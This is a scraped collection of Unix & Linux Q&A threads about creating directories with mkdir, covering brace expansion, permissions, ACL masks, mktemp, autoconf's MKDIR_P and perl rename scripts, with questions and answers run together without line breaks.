I'm trying to write a systemd unit file. How do I specify the path to an executable? How can I determine what to use? In this specific case I'm trying to use mkdir. ExecStartPre = "/bin/mkdir -p %h/.config/example/pending/";This results in a error when starting the unit file though: Jan 16 08:46:11 nixos systemd[19577]: example.service: Failed at step EXEC spawning /bin/mkdir: No such file or directoryI suppose I could just use which to find the path to mkdir - but I'm seeing a ${pkgs.nameOfPackage} in other's nix's config - so possibly I should be using this instead? which mkdir /run/current-system/sw/bin/mkdir
How do I specify a path to an executable for a systemd unit file on nix?
cron doesn't run with the same environment as your user. It's likely having issues because it's not in the proper directory. Have your script cd to the directory containing the images before executing your for loop.
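One hedged way to do that, since the script already lives in the same folder as the pictures, is to change to the script's own directory first; a sketch:
#!/bin/bash
# Work from the directory containing this script, whatever cron's working directory is
cd "$(dirname "$0")" || exit 1

for x in *.jpg; do
    d=$(date -r "$x" +%Y-%m-%d)
    mkdir -p "$d"
    mv -- "$x" "$d/"
done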
I am trying to organize my webcam picture files into folders otherwise I get thousands of pictures in one folder. I have a script foscam-move.sh (from Create sub-directories and organize files by date) with the following: #!/bin/bashfor x in *.jpg; do d=$(date -r "$x" +%Y-%m-%d) mkdir -p "$d" mv -- "$x" "$d/" doneI have the script located in the folder with all of the .jpg files. When I run it in terminal all is fine and it organizes it beautifully. When I add the following cron task it doesn't run. * * * * * /home/pi/Desktop/FI9821W_************/snap/foscam-move.sh # JOB_ID_2I have it set to run every minute because this camera takes a lot of pictures. How do I get cron to run my script every minute?
Sort files in a folder into dated folders
The macro AC_PROG_MKDIR_P is a feature test macro. It expands to shell code that tests for the best mkdir -p-capable command available. It uses MKDIR_P and ac_cv_path_mkdir (a "cache variable") to figure out what command to use. You may set the value of MKDIR_P to the command that you want to use for creating directories. The command that you use must be able to create not only a single directory but also the parent directories if these are not already existing (just like mkdir -p does). Normal: $ ./configure checking for a BSD-compatible install... /usr/bin/install -c checking whether build environment is sane... yes checking for a thread-safe mkdir -p... /usr/local/bin/gmkdir -p checking for gawk... gawk ...With MKDIR_P set: $ ./configure MKDIR_P='install -d -m 0755' checking for a BSD-compatible install... /usr/bin/install -c checking whether build environment is sane... yes checking for a thread-safe mkdir -p... install -d -m 0755 checking for gawk... gawk ...According to the documentation, one should be able to make this "permanent" by setting the cache variable ac_cv_path_mkdir to the wanted command. This variable can be set directly in the configure script (ugly) or by modifying the created config.cache file after running configure with the -C option once. However, I've found that configure adds a -p option to the value of this command which may not be wanted (the meaning of this option is different between mkdir and install). If you're happy with re-generating the configure script from its configure.ac source, you may set MKDIR_P to a value just after the call to AC_INIT. Then run autoconf (or autoreconf) to recreate configure. The most flexible way would be to set the MKDIR_P environment variable in the current shell session with export MKDIR_P='install -d' (or whatever you need). This would not require modifying any files, but would affect all configure scripts that you run in that shell session.
When I run sudo make install on a compiled package from the GNU archive, it uses mkdir -p to create the destination directories. I'd prefer it to use mkdir -p -m 0755 or install -d -m 0755 instead in order to ensure the destination directory has proper permissions for everyone under all circumstances, not just when the umask for root is 0022 (which isn't true for me). The package is using autoconf/automake and it looks like the behaviour is controlled by an M4 macro called AC_PROG_MKDIR_P. At the moment I can run sudo chmod 0755 on the directories I know have wrong permissions. But this clearly isn't the right option. I'd like to avoid studying the whole documentation in order to accomplish "just that". Any hint?
How to make autoconf use "install" instead of "mkdir -p"?
Use the command builtin to call an external command, bypassing any function of the same name. Also:What follows if is an ordinary command. To perform a string comparison, invoke the test built-in, or the [ builtin with the same syntax plus a final ], or the [[ … ]] construct which has a more relaxed syntax. See using single or double bracket - bash for more information. The -eq operator is for comparing integers. Use = to compare strings. I added some limited support for passing multiple arguments (including options such as -p). Below I call cd only if mkdir succeeded, and I call it on the last argument passed to the function. -g will only be recognized as the very first argument. Parsing options to locate and remove it from whatever position it's in is possible, but harder.mkdir () { local do_cd= if [ "$1" = "-g" ]; then do_cd=1 shift fi command mkdir "$@" && if [ -n "$do_cd" ]; then eval "cd \"\${$#}\"" fi }I don't recommend defining your custom options. They won't be shown in --help or man pages. They aren't more memorable than defining a command with a different name: either you don't remember that you have them, and there's no advantage compared to a command with a different name, or you don't remember that they're custom, and then you can find this out immediately with a custom name by asking the shell whether it's a built-in command or function (type mkcd), which is not the case with a custom option. There are use cases for overriding a standard command, but this is not one.
I have created lots of directories and I would like to make my life lazy and to auto cd into the directory that I made with the option of -g with the result of mkdir -g foo The terminal would be like this: User:/$ mkdir -g foo User:/foo/$ I have looked at this page but with no success. Is there a one-liner that allows me to create a directory and move into it at the same time? I have tried in my .bash_profile with this command, but it just overrides the command entirely. (and realizing that it is an infinite loop later) mkdir() { if "$1" -eq "-g" mkdir "$2" cd "$2" else ## do the regular code fi }The other thing is that I don't want to make more aliases because I will eventually forget all of the aliases that I have. So no, I don't want this: mkcd() { if "$1" -eq "-g" mkdir "$2" cd "$2" else ## do the regular code fi }I know that I most likely don't have the option thingy right, please correct me on that, but any help would be awesome!
how to add a custom option to the mkdir command
Read the lines one by one and use proper quoting: while IFS= read -r name; do mkdir -- "$name"; done <x.txt
I'm cating a file, and the output is something like this: Help me my friend Temptation Sorrow True Love Vanilla Sky I was here SOS ...I'm trying to create directory of all of these lines. What I have tried is: mkdir `cat x.txt`But the result is a mess! For instance, I was here will be split into three directories like I, was, and here. How can I fix this?? Thanks in advance.
Create directories from lines of a file [duplicate]
Change the |s in your command to ,: mkdir {Single,Multi}Lane_{Single,Dual}Carriageway_{USA,Europe}3.5.1 Brace Expansion
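The same comma-separated form works with more than two alternatives per group, e.g.:
mkdir {Single,Multi}Lane_{Single,Dual}Carriageway_{USA,Europe,Asia}
which expands to 2 x 2 x 3 = 12 directory names before mkdir ever runs.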
In Bash or Zsh, what is the shortest way to create a folder for each possible combination of substrings? Is there maybe even a notation such as mkdir {Single|Multi}Lane_{Single|Dual}Carriageway_{USA|Europe}which should result in the creation of SingleLane_SingleCarriageway_USA MultiLane_SingleCarriageway_USA SingleLane_DualCarriageway_USA MultiLane_DualCarriageway_USA SingleLane_SingleCarriageway_Europe MultiLane_SingleCarriageway_Europe SingleLane_DualCarriageway_Europe MultiLane_DualCarriageway_EuropeMy substrings also may have more than two options, such as {USA, Europe, Asia}.
How can I quickly create all folders named {Single|Multi}Lane_{Single|Dual}Carriageway_{USA|Europe}
The mkdir utility creates a single directory. When used with -m it creates the directory and effectively runs chmod on it with the given permissions (although this does not happen in two steps, which could be important under some circumstances). With -p, any intermediate directories that do not already exist are created. The mode given to -m still only applies to the last name in the pathname, since that is the directory that you're wanting to create (the intermediate directories are created to allow the creation of that directory with the given mode). The POSIX standard for mkdir says that each intermediate directory should be created with the mode (S_IWUSR|S_IXUSR|~filemask)&0777 where filemask is your shell's umask value. In the "Application Usage" section, it says[...] For intermediate pathname components created by mkdir, the mode is the default modified by u+wx so that the subdirectories can always be created regardless of the file mode creation mask; if different ultimate permissions are desired for the intermediate directories, they can be changed afterwards with chmod.This means that the mode for the intermediate directories is set to allow you to create a directory that potentially has no user write or execute permissions. If the intermediate directories were also given no execute and/or write permissions, the last components of the directory path would not be able to be created. In your specific case, use mkdir -p -m 764 a/b/c chmod 764 a/b chmod 764 aIf you know for sure that none of the directories previously existed, use mkdir -p -m 764 a/b/c chmod -R 764 a
When I use mkdir -pm 764 a/b/c, only c gets the 764 permissions, while a and b have the default permissions. Why is that so? Why don't all the directories get 764 permissions?
Regarding permissions on intermediate folders created using "mkdir -pm 764 a/b/c"
$ cd foo $ mkdir var1 $ mv * var1The * glob matches var1 as well, but mv refuses to move a directory into itself: it prints an error for var1 and moves everything else. (Note that * does not match hidden files, though there are none in this example.)
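If foo could also contain hidden files, a bash-specific sketch enables dotglob for the move:
cd foo
mkdir var1
shopt -s dotglob      # make * match dot files too (bash)
mv -- * var1          # mv still reports an error for var1 itself and skips it
shopt -u dotglob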
I have a directory foo/ bar.txt baz.yzw wun/ a.outNow, I would like to basically add a directory in between, i.e. I would like to make it foo/ var1/ bar.txt baz.yzw wun/ a.outwith the intent of also adding other stuff to foo, but kept separate from the old contents. I could of course do it like this: $ mkdir foo-new $ mv foo foo-new $ mv foo-new fooor $ cd foo $ mkdir var1 $ mv $(ls | grep -v var1) var1but both seem inelegant and are error-prone. Is there a better way to do it?
How to move a folder into itself?
In terms of tools used: no. touch will fail (rightly) if you are trying to operate in a directory that does not exist, and mkdir does precisely one thing: create directories, not normal files. Two different jobs mandate two different tools. That said, if you're talking about efficiency in terms of the number of lines in a script, or the readability of one, you could put it into a function: seedfile() { mkdir -p -- "$(dirname -- "$1")" && touch -- "$1" }seedfile /path/to/location/one/file.txt seedfile /path/to/somewhere/else/file.txt seedfile local/paths/work/too/file.txt
For now I use this: mkdir -p a/b/c/d/e; touch a/b/c/d/e/file.abc; Are there more efficient ways?
Create file in subdirectories that doesn't exist (../new_folder/new_folder/new_file.ext)
I compiled latest coreutils from source and I still need to use -p to create directory with parents: $ src/mkdir --version mkdir (GNU coreutils) 9.0.11-13af8$ src/mkdir a/b src/mkdir: cannot create directory ‘a/b’: No such file or directorySo you either have an alias for mkdir -p (and probably also with -v for verbose output because mkdir -p doesn't print the information about creating the directories) or coreutils is patched by your distribution.
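To check which of the two it is on your system, something like this should tell you:
type mkdir            # reports whether mkdir is an alias, a function or /usr/bin/mkdir
command mkdir a/b     # bypasses aliases and functions; fails if 'a' does not exist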
I can't find any reference of this change of behaviour $ mkdir --version mkdir (GNU coreutils) 9.0 Copyright (C) 2021 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.Written by David MacKenzie.None of the folders exists. $ mkdir asdfg/qwerty mkdir: created directory 'asdfg' mkdir: created directory 'asdfg/qwerty'However, with mkdir (GNU coreutils) 8.25 the behaviour is as expected. ➜ ~ mkdir asdfg/qwerty mkdir: cannot create directory ‘asdfg/qwerty’: No such file or directory
Is the `-p` flag not needed anymore in `mkdir` 9.0?
Yes, that syntax is not POSIX. Only a standalone {} (on its own argument) is guaranteed to be expanded. Use: find src_dir -type d -exec sh -c 'for dir do mkdir -p "dst_dir/$dir"; done' sh {} +Or to avoid running one mkdir per directory: find src_dir -type d -exec sh -c 'for dir do set -- "$@" "dst_dir/$dir"; shift; done mkdir -p "$@"' sh {} +(though there's a risk of reaching the "arg list too large" condition). Note that it would create dst_dir/src_dir/x/y.... If you wanted dst_dir/x/y..., you'd do: find src_dir -type d -exec sh -c 'for dir do set -- "$@" "dst_dir${dir#src_dir}"; shift; done mkdir -p "$@"' sh {} +Another option, if you can guarantee that directory paths don't contain newline characters would be to use pax: find src_dir -type d | pax -rw dst_dirThat would allow you to also copy the directories' metadata like ownership and permissions (with -pe) To remove the leading src_dir component in the destination: find src_dir -path '*/*' -type d | pax -'s@^src_dir/@@' -rw dst_dirOr: (cd src_dir && find . -type d | pax -rw ../dst_dir)
I'm trying to copy directory structure from src_dir to dst_dir. On my CentOS 6.4 Linux Bash this command works fine. [localhost]$ find src_dir src_dir src_dir/dir2 src_dir/dir2/dir4 src_dir/dir1 src_dir/dir1/test.txt src_dir/dir1/dir3[localhost]$ find src_dir -type d -exec mkdir -p "dst_dir/{}" \; [localhost]$ find dst_dir dst_dir/src_dir dst_dir/src_dir/dir2 dst_dir/src_dir/dir1 dst_dir/src_dir/dir1/dir3 But, when I'm doing the same command in IBM AIX 6.1, I got this output [aix61:/data]find dst_dir dst_dir dst_dir/{} Maybe the 'find' command parameter {} replacement is somewhat different in AIX. But I don't know how to solve it. Any advice would be helpful.
IBM AIX find src_dir -type d -exec mkdir -p "dst_dir/{}" \; doesn't work
What you see in the ls listing are the "traditional" permission bits, all you'd have in a system that doesn't support ACLs, and all that can be used by tools (or users!) that aren't ACL-aware. The "traditional" group permission bits don't correspond to the owning group ACL, but to the ACL mask (acl(5) man page):CORRESPONDENCE BETWEEN ACL ENTRIES AND FILE PERMISSION BITS The permissions defined by ACLs are a superset of the permissions specified by the file permission bits. There is a correspondence between the file owner, group, and other permissions and specific ACL entries: the owner permissions correspond to the permissions of the ACL_USER_OBJ entry. If the ACL has an ACL_MASK entry, the group permissions correspond to the permissions of the ACL_MASK entry. Otherwise, if the ACL has no ACL_MASK entry, the group permissions correspond to the permissions of the ACL_GROUP_OBJ entry. The other permissions correspond to the permissions of the ACL_OTHER entry.What the mask does, is limit the permissions that can be granted by ACL entries for named users, named groups, or the owning group. In a way, you can think of the three sets of "traditional" permission bits as applying to 1) the owning user, 2) other explicitly defined users (without ACLs: members of a the owning group; with ACLs: those plus other named users or members of other named groups), and 3) everyone else. The practical reasoning there is that if a user or program wants to make sure only the owner has write permissions to the file, something like chmod go-w still works to do that, even without the actor knowing about ACLs. So, having it show rwx for the group in the ls listing is by design, since you have the user:zigbee2mqtt:rwx and user:stack:r-x ACL entries there. The ls output just hints that there are some others apart from the owning user who have read, write and/or execute permissions on the file. Setting the mask to 000 (with e.g. chmod g-rwx or the appropriate setfacl command) would make those ACL entries for user:zigbee2mqtt and user:stack ineffective.When you create a file with touch, and see mask::rw- on it, that's because touch and most other tools create regular files with permissions 0666, not 0777, leaving the x bits off. Most files shouldn't be executable. Regardless of the ACLs, the permissions passed to the open() system call still count, the same as if the permissions were changed with chmod(). Apart from leaving the x bits off, this allows a program to create private files by setting the permissions bits to 0600.
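If you do decide you want the wider mask on such a file anyway, either view of the change works, for example:
chmod g+rwx bar         # on a file with an extended ACL this sets the mask, not the owning group's entry
setfacl -m m::rwx bar   # same effect, expressed as an ACL operation
getfacl bar             # the "#effective:" comments should be gone now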
I am pretty sure it is a stupid mistake but I can't seem to figure it out by myself, so please have a look. I set up an ACL for the current folder like so: zigbee2mqtt@nuc:/tmp/folder$ getfacl . # file: . # owner: zigbee2mqtt # group: zigbee2mqtt user::rwx user:stack:r-x user:zigbee2mqtt:rwx user:milkpirate:rwx group::--- mask::rwx other::--- default:user::rwx default:user:stack:r-x default:user:zigbee2mqtt:rwx default:user:milkpirate:rwx default:group::--- default:mask::rwx default:other::--- zigbee2mqtt@nuc:/tmp/folder$ id uid=978(zigbee2mqtt) gid=977(zigbee2mqtt) groups=977(zigbee2mqtt)so when I now create a folder/file in that folder like so: zigbee2mqtt@nuc:/tmp/folder$ touch foo; mkdir barIt results in the following permission on the folder foo: zigbee2mqtt@nuc:/tmp/folder$ getfacl foo # file: foo # owner: zigbee2mqtt # group: zigbee2mqtt user::rwx user:stack:r-x user:zigbee2mqtt:rwx user:milkpirate:rwx group::--- mask::rwx other::--- default:user::rwx default:user:stack:r-x default:user:zigbee2mqtt:rwx default:user:milkpirate:rwx default:group::--- default:mask::rwx default:other::---which looks fine so far. But the ACL of the file then looks off: # file: bar # owner: zigbee2mqtt # group: zigbee2mqtt user::rw- user:stack:r-x #effective:r-- user:zigbee2mqtt:rwx #effective:rw- user:milkpirate:rwx #effective:rw- group::--- mask::rw- other::---I would expect the mask to be rwx (desired). Since group and other are --- (desired) the permission in ls -la to be the same, but they are:zigbee2mqtt@nuc:/tmp/folder$ ls -la total 20 drwxrwx---+ 3 zigbee2mqtt zigbee2mqtt 4096 Jan 15 17:55 . drwxrwxrwt 16 root root 4096 Jan 15 17:59 .. -rw-rw----+ 1 zigbee2mqtt zigbee2mqtt 0 Jan 15 17:55 bar drwxrwx---+ 2 zigbee2mqtt zigbee2mqtt 4096 Jan 15 17:55 foobut I would expect (and desire): zigbee2mqtt@nuc:/tmp/folder$ ls -la total 20 drwxrwx---+ 3 zigbee2mqtt zigbee2mqtt 4096 Jan 15 17:55 . drwxrwxrwt 16 root root 4096 Jan 15 17:59 .. -rw-------+ 1 zigbee2mqtt zigbee2mqtt 0 Jan 15 17:55 bar drwx------+ 2 zigbee2mqtt zigbee2mqtt 4096 Jan 15 17:55 fooEDIT: Ok, did some testing and all seems to work as desired, the result of ls -la does not seem to reflect the correct rights: zigbee2mqtt@nuc:/tmp/folder$ sudo -u nginx -g zigbee2mqtt bash nginx@nuc:/tmp/folder$ ls ls: cannot open directory '.': Permission denied
touch/mkdir seems to ignore default ACL
Bash, like any POSIX shell, splits commands into tokens before expanding words (which, in Bash, includes brace expansion). mkdir -p /root/backups/{db, dirs}contains a space, so the command is first split into the tokens mkdir, -p, /root/backups/{db,, and dirs}. None of these need further expansion, so mkdir is run with the three arguments -p, /root/backups/{db, and dirs}. It creates {db in /root/backups, and dirs} in the current directory. If you drop the space you’ll get the behaviour you’re after.
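That is:
mkdir -p /root/backups/{db,dirs}
# after brace expansion this is equivalent to
mkdir -p /root/backups/db /root/backups/dirs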
I executed the following code in Ubuntu server 16.04 xenial: mkdir -p /root/backups/{db, dirs}I recall that in another system, it worked like a charm creating all 3 dirs: /root/backups/ /root/backups/db /root/backups/dirsYet this time the result was: /root/backups/ /root/backups/{db,Why is the result partial and broken?
mkdir -p dir with braces created wrongly
You can use the following 'command' to get the desired result: for i in {1..7}; do mkdir /tmp/$(date +"%A" --date "$i days ago"); done
How can I create directories named as days of the week (i.e Monday, Tuesday, .... Saturday) inside a directory like /tmp/ in one command only? Like combination of mkdir with date +%A or any other. mkdir -p /tmp/"$(date +%A)" ---> /tmp/TuesdayShould be as below after command executes. /tmp/Monday /tmp/Tuesday . . . /tmp/SaturdayI want this in a single command, not a script.
One liner mkdir with directory naming as days?
PATH is an environment variable. It's what your shell uses to find the commands it is going to run. More precisely, the PATH environment variable contains a colon-separated list of directory names, which are searched in sequence for an executable with the name that you specify when you type a command. (Unless of course the command you type is a shell builtin, alias or function.) When you set PATH in your script you are "masking" the value of the environment variable with the shell variable of the same name. The takeaway from this is don't use all caps names for regular shell variables. Since you don't intend an environment variable, just use a lowercase variable name. Also see:Are there naming conventions for variables in shell scripts?
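A corrected sketch of the script with a lower-case name:
#!/bin/bash
dir=/home/name/        # does not clobber the PATH environment variable
mkdir -p "$dir"
cd "$dir" && echo "done."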
I have separate scripts for tasks in bash. Here is the broken one: #!/bin/bash PATH=/home/name/ mkdir $PATH cd $PATH && echo "done." exit 0Today it broke: the first time it simply didn't want to run cd, but created the directory. The second time it just said "mkdir command not found." Running these commands directly, separated by semicolons, works fine. What is going on?
Bash can't run command from script: mkdir command not found [closed]
~USER is just a shorthand notation for the home directory of user USER. For a normal user, this would typically be /home/USER, but for root, it is typically /root. As for your question whether one is preferable to the other: The only difference is that ~root gets expanded dynamically to root's home directory, whereas /root is an absolute path that does not undergo any expansion process. What you want depends on your particular use case. If you want your script to work on machines where root's home directory lies elsewhere than in /root, then use ~root. If you want to make sure that the absolute path /root is always used, use /root. In practice, it should not make any difference in most cases, though I would personally feel safer using /root unless I have reason to expect that my script will be run on machines where root's home directory is not /root.
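You can see where the expansion comes from with, for example:
getent passwd root | cut -d: -f6   # the home directory field from the passwd database
echo ~root                         # the shell expands to the same path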
This is fairly trivial and I'm just curious as to why mkdir ~root/.ssh is the same thing as mkdir /root/.ssh? I'm reviewing the following docker file and the creator uses mkdir ~root/.ssh to create the .ssh directory: https://github.com/macropin/docker-sshd/blob/master/Dockerfile Is there any advantage to one over the other? When I first read it I assumed that ~root would expand to /rootroot.
Why is `mkdir ~root/.ssh` the same thing as `mkdir /root/.ssh`?
When using mkdir, the script would have to make sure that it creates a directory with a name that does not already exist. It would be an error to use mkdir dirname if dirname is an existing name in the current directory. When creating a temporary directory (i.e. a directory that is not needed much longer than during the lifetime of the current script), the name of the directory is not generally important, and mktemp -d will find a name that is not already taken by something else. mktemp -d makes it easier and more secure to create a temporary directory. Without mktemp -d, one would have to try to mkdir with several names until one succeeded. This is both unnecessarily complicated and can be done wrongly (possibly introducing subtle race conditions in the code). mktemp also gives the user of the script a bit of control in where they want the temporary directory to be created. If the script, for example, produces a massive amount of temporary data that has to be stored in that directory, the user may set the TMPDIR environment variable (before or as they are invoking the script) to point to a writable directory on a partition where there is enough space available. mktemp -d would then create the temporary directory beneath that path. If TMPDIR is not set, mktemp will use /tmp in its place.
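A common usage sketch, including cleanup when the script exits:
#!/bin/bash
scripttmp=$(mktemp -d) || exit 1
trap 'rm -rf -- "$scripttmp"' EXIT   # remove the directory and its contents on exit

# ... use "$scripttmp" for intermediate files ...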
I'm trying to understand Stephen Kitt's answer to this question where he created a temporary directory with the following code: #!/bin/bashscripttmp=$(mktemp -d) # Create a temporary directory (these will usually be created under /tmp or /var/tmp/)Each time I run this command I see a new temporary directory created under /tmp/ (I didn't know it would appear there until reading Roaima's answer here): IIUC, there is no programmatical difference between a regular directory and a temporary directory (the only difference is in how these directories are used, by means of the time each one stays on the machine). If there is no programmatical difference, why should one prefer mktemp -d over the more minimal mkdir?
Is there a programmatical difference between directories created with mktemp -d or mkdir?
Using the perl rename utility: Note: perl rename is also known as file-rename, perl-rename, or prename. Not to be confused with the rename utility from util-linux which has completely different and incompatible capabilities and command-line options. perl rename is the default rename on Debian...IIRC, it's in the prename package on Centos and the command should be executed as prename rather than rename. $ rename -n 'if (m/(^\d{4}_\d\d_\d\d)_(\d\d)/) { my ($date,$hour) = ($1,$2); my $dir = "./$date/$hour/"; mkdir $date; mkdir $dir; s=^=$dir= }' * rename(2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz, ./2021_10_15/23/2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz) rename(2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz, ./2021_11_24/21/2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz) rename(2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz, ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz) rename(2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz, ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz) rename(2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz, ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz) rename(2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz, ./2021_11_24/21/2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz) rename(2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz, ./2021_11_25/20/2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz) rename(2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz, ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz) rename(2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz, ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz) rename(2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz, ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz)The -n is a dry-run option, it will only show what it would do without actually doing it. Remove it (or replace with -v for verbose output) when you're sure the rename script is going to do what you want. The script works by first extracting the date and hour portions of each filename (skipping any filenames that don't match). Then it creates the directories for the date and date/hour, then renames the filename into those directories. This assumes that the filenames are in the current directory. 
If they aren't, you'll have to adjust the m// matching regex in the first line AND the s=== substitution regex in the second-last line.Alternate version using the File::Path perl core module (which is included with perl), instead of using mkdir twice (the make_path function works like the mkdir -p shell command): $ rename -v 'BEGIN {use File::Path qw(make_path)}; if (m/(^\d{4}_\d\d_\d\d)_(\d\d)/) { my $dir = "./$1/$2/"; make_path $dir; s=^=$dir= }' * 2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz renamed as ./2021_10_15/23/2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz 2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz renamed as ./2021_11_24/21/2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz 2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz renamed as ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz 2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz renamed as ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz 2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz renamed as ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz 2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz renamed as ./2021_11_24/21/2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz 2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz renamed as ./2021_11_25/20/2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz 2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz renamed as ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz 2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz renamed as ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz 2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz renamed as ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gzThis isn't really any better than the first version, but it does demonstrate that you can use any perl code, any perl module to rename and/or move files.Third version, this one uses File::Basename to split the input pathname into $path and $file portions. It can cope with filenames in the current directory, or in any other directory. File::Basename is a core perl module, so is included with perl. It provides three useful functions, basename() and dirname() (which work similarly to the shell tools of the same name), and fileparse() which is what I'm using in this script to extract both the basename and the directory into separate variables. 
rename -n 'BEGIN {use File::Path qw(make_path); use File::Basename}; my ($file, $path) = fileparse($_); if ($file =~ m/(\d{4}_\d\d_\d\d)_(\d\d)/) { my $dir = "$path/$1/$2"; make_path $dir; $_ = "$dir/$file" }' /home/cas/rename-test/* rename(/home/cas/rename-test/2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz, /home/cas/rename-test/2021_10_15/23/2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz) rename(/home/cas/rename-test/2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz, /home/cas/rename-test/2021_11_24/21/2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz) rename(/home/cas/rename-test/2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz, /home/cas/rename-test/2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz) rename(/home/cas/rename-test/2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz, /home/cas/rename-test/2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz) rename(/home/cas/rename-test/2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz, /home/cas/rename-test/2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz) rename(/home/cas/rename-test/2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz, /home/cas/rename-test/2021_11_24/21/2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz) rename(/home/cas/rename-test/2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz, /home/cas/rename-test/2021_11_25/20/2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz) rename(/home/cas/rename-test/2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz, /home/cas/rename-test/2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz) rename(/home/cas/rename-test/2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz, /home/cas/rename-test/2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz) rename(/home/cas/rename-test/2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz, /home/cas/rename-test/2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz)BTW, it would be trivial to modify this so that it moved the files to a completely different path - just make it do something like my $dir = "/my/new/path/$1/$2"; instead of my $dir = "$path/$1/$2"; The key thing to understand about how the perl rename utility works is that iff the rename script modifies the $_ variable then rename will attempt to rename the file to the new value of $_. If $_ is unchanged, it will not try to rename it. This is why you can use any perl code to rename files - all it has to do is change $_. Most often you'll probably use very simple sed-like rename scripts (e.g. rename 's/ +/_/g' * to rename spaces in filenames to an underscore) but the rename algorithm can be as complex as you need it to be. $_ is a very important variable in perl - it's used as the default variable to hold input from file handles and iterators for loops if the programmer doesn't specify one. It's also used as the default operand for several operators (like m//, s///, tr///) and as the default argument for many (but not all) functions. See man perlvar and search for $_ (you'll need to escape that in less as \$_).BTW, one thing I didn't mention about rename earlier is that it can take filenames either as arguments on the command line or from stdin. It defaults to newline-separated input from stdin (so it won't work with filenames that contain newlines - an annoying but completely valid possibility).
You can use the -0 argument to make it use NUL separated input instead of newline-separated...so, it can work with any filenames, taking input from anything that can generate a list of NUL-separated filenames (e.g. find ... -print0, but it's probably better to just use find's -exec ... {} + option). rename will also refuse to rename a file over an existing file unless you use its -f or --force option.
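For comparison only, a plain-bash sketch of the same grouping, assuming the files sit in the current directory and all match the layout described in the question:
for f in ????_??_??_??_*.csv.gz; do
    date=${f:0:10}     # e.g. 2021_11_24
    hour=${f:11:2}     # e.g. 21
    mkdir -p "$date/$hour"
    mv -- "$f" "$date/$hour/"
done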
